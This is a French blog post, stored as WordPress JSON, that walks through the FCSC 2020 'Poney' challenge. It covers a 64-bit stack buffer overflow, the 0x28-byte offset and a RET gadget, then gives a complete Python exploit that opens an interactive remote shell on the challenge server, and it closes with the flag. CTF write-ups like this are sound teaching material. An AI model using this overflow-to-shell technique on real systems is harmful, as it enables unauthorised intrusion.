{"id":144,"date":"2020-05-05T15:28:00","date_gmt":"2020-05-05T13:28:00","guid":{"rendered":"https:\/\/blog.caturday-lovers.fr.nf\/?p=144"},"modified":"2020-05-11T09:34:20","modified_gmt":"2020-05-11T07:34:20","slug":"les-chatons-ont-la-reponse-fcsc-2020-poney","status":"publish","type":"post","link":"https:\/\/blog.caturday-lovers.fr.nf\/?p=144","title":{"rendered":"Les chatons ont la r\u00e9ponse \u2013 FCSC 2020 \/\/ Poney"},"content":{"rendered":"\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"497\" height=\"552\" src=\"https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/2020-05-05_14h13_04-1.png\" alt=\"\" class=\"wp-image-146\" srcset=\"https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/2020-05-05_14h13_04-1.png 497w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/2020-05-05_14h13_04-1-270x300.png 270w\" sizes=\"auto, (max-width: 497px) 100vw, 497px\" \/><\/figure><\/div>\n\n\n\n<!--more-->\n\n\n\n<h2 class=\"wp-block-heading\">Intro<\/h2>\n\n\n\n<p>Bon, mis \u00e0 part que le titre me fait remonter de grands souvenirs au sein de la spirit-lan, nous avons un petit challenge en reverse.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Give me the correct input, and I will give you a shell :<\/h2>\n\n\n\n<p>Oh, vraiment ? Juste cela ? C&rsquo;est trop beau pour \u00eatre vrai ! Que nous dit radare2 ? Il dit que le gateau est un mensonge ! C&rsquo;est un peu plus qu&rsquo;une entr\u00e9e correcte qu&rsquo;il nous faut, et nous allons voir cela ensemble.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Zone 49, Mai 2020, autopsie du poney<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"555\" src=\"https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/2020-05-05_14h25_43-1024x555.png\" alt=\"\" class=\"wp-image-147\" srcset=\"https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/2020-05-05_14h25_43-1024x555.png 1024w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/2020-05-05_14h25_43-300x163.png 300w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/2020-05-05_14h25_43-768x416.png 768w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/2020-05-05_14h25_43-1536x832.png 1536w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/2020-05-05_14h25_43.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>Dr bouchard, Dr bouchard, il y a plein de couleurs !!!!!<\/figcaption><\/figure>\n\n\n\n<p>Que voyons-nous, dans la fonction main, nous avons deux affichages de strings (en 400691 et 40069d) et la r\u00e9cup\u00e9ration de l&rsquo;input utilisateur en 4006ae. Pour le moment, je ne vois pas d&rsquo;appel vers la fonction qui lancera le shell. Vous savez ce que cela veux dire ? Que l&rsquo;on se rapproche d&rsquo;un buffer overflow avec ex\u00e9cution de code.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">SHIELD WALL !!!!!!!<\/h2>\n\n\n\n<p>Expliquons rapidement le buffer overflow, le principe est de d\u00e9passer la capacit\u00e9 du buffer qui r\u00e9cup\u00e8re notre entr\u00e9e, et de forcer le logiciel h\u00f4te \u00e0 ex\u00e9cuter une commande qui n&rsquo;\u00e9tait pas pr\u00e9vue \u00e0 la base (calc.exe, un code malveillant, un acc\u00e8s shell, \u2026). <br>Comment trouvons-nous la taille du buffer ? Dans notre cas elle est initialis\u00e9e au d\u00e9but du main :<br><strong><em>; var int64_t var_20h @ rbp-0x20<\/em><\/strong><br>Nous savons que nous sommes sur une application 64 bits, donc les registres seront sur 8 bits (au lieu de 4 en 32 bits), et que le buffer est initialis\u00e9 pour accueillir 0x20 caract\u00e8res ( 32 caract\u00e8res en d\u00e9cimal).  <br>Donc, si on d\u00e9passe les 0x28 caract\u00e8res, on d\u00e9passe le tampon, et nous arrivons dans la zone critique. Cela se voit quand l&rsquo;application vous renvoit l&rsquo;erreur suivante :<br><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"42\" src=\"https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-1-1024x42.png\" alt=\"\" class=\"wp-image-148\" srcset=\"https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-1-1024x42.png 1024w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-1-300x12.png 300w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-1-768x32.png 768w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-1-1536x63.png 1536w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-1.png 1893w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Maintenant que nous savons comment briser les pattes du poney, il est temps de lui en mettre des bioniques. Le principe est d&rsquo;appeler la fonction dont nous avons besoin, dans notre cas shell, et une fois dedans, nous aurons gagn\u00e9. <br>Afin d&rsquo;avoir notre code clean et d&rsquo;\u00e9viter des pannes al\u00e9atoires, nous allons utiliser un RET comme un gadget afin de nettoyer les registres, pas besoin d&rsquo;inventer la poudre ou de compiler un OS, nous allons r\u00e9cup\u00e9rer ceux d\u00e9j\u00e0 en place :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"862\" height=\"192\" src=\"https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-2.png\" alt=\"\" class=\"wp-image-149\" srcset=\"https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-2.png 862w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-2-300x67.png 300w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-2-768x171.png 768w\" sizes=\"auto, (max-width: 862px) 100vw, 862px\" \/><figcaption>la fonction shell, o\u00f9 nous allons emprunter le RET et son entrypoint<\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Exploit.py<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>import re\nimport socket\nfrom pwn import *\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nshell = \"challenges1.france-cybersecurity-challenge.fr\"\nport = 4000\nretAddr = 0x004006db\nshellAddr = 0x00400676\noverflow = cyclic(0x20+8)\npayload = overflow+p64(retAddr)+p64(shellAddr)\n\ndef SockClose():\n    print(\"&#91;*] Goodbye Mr Bond !\")\n    s.close()\n    input()\n\ndef SockOpen():\n    s.connect((shell,port))\n    Exploit()\n\ndef Exploit():\n    print(\"&#91;*] Doing Black Magic\")\n    r = s.recv(1024)\n    print(r)\n    while \">>>\" not in str(r):\n        print(\"&#91;?] Waiting for >>>\")\n        r = s.recv(1024)\n        print(r)\n    print(\"&#91;!] Sending\\n%s\" % hexdump(payload))\n    s.send(\"%s \\n\"% payload)\n    print(\"&#91;!] Payload Send\")\n    while 1:\n        cmd = raw_input(\"(EvilCat-Shell)$ \")\n        s.send(\"%s \\n\"% cmd)\n        r = s.recv(1024)\n        if not len(r):\n            print(\"&#91;!] DeadShell\")\n\n        print(r)\n\ntry:\n    SockOpen()\nexcept:\n    print(\"&#91;!] Exploit Error\")\nfinally:\n    SockClose()\n\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"974\" height=\"328\" src=\"https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-3.png\" alt=\"\" class=\"wp-image-150\" srcset=\"https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-3.png 974w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-3-300x101.png 300w, https:\/\/blog.caturday-lovers.fr.nf\/wp-content\/uploads\/2020\/05\/image-3-768x259.png 768w\" sizes=\"auto, (max-width: 974px) 100vw, 974px\" \/><figcaption>don&rsquo;t laugh at meeow<\/figcaption><\/figure>\n\n\n\n<p>Le contrat est rempli, nous avons un shell, et notre flag !<\/p>\n\n\n\n<p>FCSC{725dd45f9c98099bcca6e9922beda74d381af1145dfce3b933512a380a356acf}<\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":13,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[90,92,96,63,61,93,91,94,95],"class_list":["post-144","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kitensgotanswer","tag-anssi","tag-buffer","tag-code-execution","tag-ecsc","tag-fcsc","tag-overflow","tag-poney","tag-ret","tag-shell"],"_links":{"self":[{"href":"https:\/\/blog.caturday-lovers.fr.nf\/index.php?rest_route=\/wp\/v2\/posts\/144","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.caturday-lovers.fr.nf\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.caturday-lovers.fr.nf\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.caturday-lovers.fr.nf\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.caturday-lovers.fr.nf\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=144"}],"version-history":[{"count":5,"href":"https:\/\/blog.caturday-lovers.fr.nf\/index.php?rest_route=\/wp\/v2\/posts\/144\/revisions"}],"predecessor-version":[{"id":256,"href":"https:\/\/blog.caturday-lovers.fr.nf\/index.php?rest_route=\/wp\/v2\/posts\/144\/revisions\/256"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.caturday-lovers.fr.nf\/index.php?rest_route=\/wp\/v2\/media\/13"}],"wp:attachment":[{"href":"https:\/\/blog.caturday-lovers.fr.nf\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=144"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.caturday-lovers.fr.nf\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=144"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.caturday-lovers.fr.nf\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=144"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}